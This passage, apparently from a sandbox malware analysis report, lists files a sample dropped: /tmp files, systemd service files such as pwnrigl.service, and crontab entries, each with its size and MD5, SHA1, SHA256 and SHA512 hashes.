                                                                                                                                                                                                                                                                                                                                                        c964791501a48e919446892fe14ed101c27da375668ac7a24de891dc68356f9b

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        6a5ec5083e58cc3e70bf8a395c85bf66c913737b17266f24925339b26dfa4d641cc9cd83922ef7e9dc7ed6febfceb171b7e051dd4c4741028e0328a431f080a6

                                                                                                                                                                                                                                                                                                                                                      • /tmp/64f1b344-f61f-48c2-a67b-7f3fbb286f46

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        3.2MB

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        7b53cfbbdad8231443b31dd36d7296de

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        bf4a0a58fb6e6d8305bf57eb728e8243d879db94

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        1a7e3988f870b32971389ad121fe97ee18a517df09d214910cafad2256d2ef02

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        8c7952d2fb9ba68fda00e4b2f4332095d5cc98ca3452dcb5c0ee66472da62389c29f59724514fa7dcf009847355d5bc98dd39a6e64215b29296911911cfc15cc

                                                                                                                                                                                                                                                                                                                                                      • /tmp/d98da14b-7968-4d23-a486-fc796db13348

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        703B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        43707f96a39fcc3e40187de0b591ed94

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        5e9d1e93c8d3b83012855c24977c2c97d040dad0

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        d341bed5f3cdb6b01cac8ebdbc02a98a7a265902c200a52b473126ab316e4c9e

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        ac2cd46b61aad5f6d4a73d1c90f90d9a6b3c006a46fb439260c280918a329fa8e7928492bbc8a05337d18fa23f49fda2056c50bffb75618972d4c2d85560bbb1

                                                                                                                                                                                                                                                                                                                                                      • /usr/lib/systemd/system/pwnrigl.service

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        388B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        34bba0e0c7ab1c364409fc350fa37868

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        a362f6eb47fa0ae5973d1d3b72a20e3c727cbd56

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        7d3126408366c9a8813fac8aa2e970e18e837542209c38b751bdee68c06304e1

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        249b8608d3a89f9e2a075a6b8164457686a256665729d7e441cafcba35567dd157eeb5123221c8ee4377993907e0100bcd55888fb94a36b557074c0df2850b26

                                                                                                                                                                                                                                                                                                                                                      • /usr/lib/systemd/system/sedmrxMZ7

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        385B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        9297e32544b3f6f52346919c3dcc4d78

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        a817c64117b4cba178242bf99b008c094f836c7c

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        fb6251a22cfb915b67202de5f89f331f18559e09438a89914271fe51018a4311

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        8472916e8ed3c8cc7c8db00c2dbe6c103d18406deb6f2d3b7cdba2573cc843adff36a7814997a25f134a53434b8d9c87705d0a184534dae617b2e9b385763662

                                                                                                                                                                                                                                                                                                                                                      • /var/spool/cron/crontabs/tmp.51m6qA

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        253B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        d08a4f43c930d1d5491a0d39bf067d11

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        4bf77dda4a051f388c6ddecac86d473a93ebec60

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        7751406a2d0a0da052ea4cd0823f280183d6ff8f5be17608dfaecd6d70cacfa8

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        af586bb4a4c7c8db314fdadaa27914b3147a38889e48885a4ff37ed5cc8f20af121d6628e8e80236fe429b0d67d04101f235dca87b11de1551863e8e34f69e31

                                                                                                                                                                                                                                                                                                                                                      • /var/spool/cron/crontabs/tmp.BECZyf

                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                        265B

                                                                                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                                                                                        39e8cc7c9bb4bad75eaa98467e480015

                                                                                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                                                                                        4500949fdd42554ed7bcccc21f8d152cc9de0c56

                                                                                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                                                                                        eb387e6a2a836adf4b5e940412aba18a4d0ddd2c62a586337abd0ad467b9d968

                                                                                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                                                                                        8ff2ef21c02de7536b8bc0ef6b60b814ba0faeb6a04c6ab55f1727f27af5af80f7d1de4ffb5913260675ef80b34f15fdb57a2fbb00b6b8afeb59a8e5a421c53f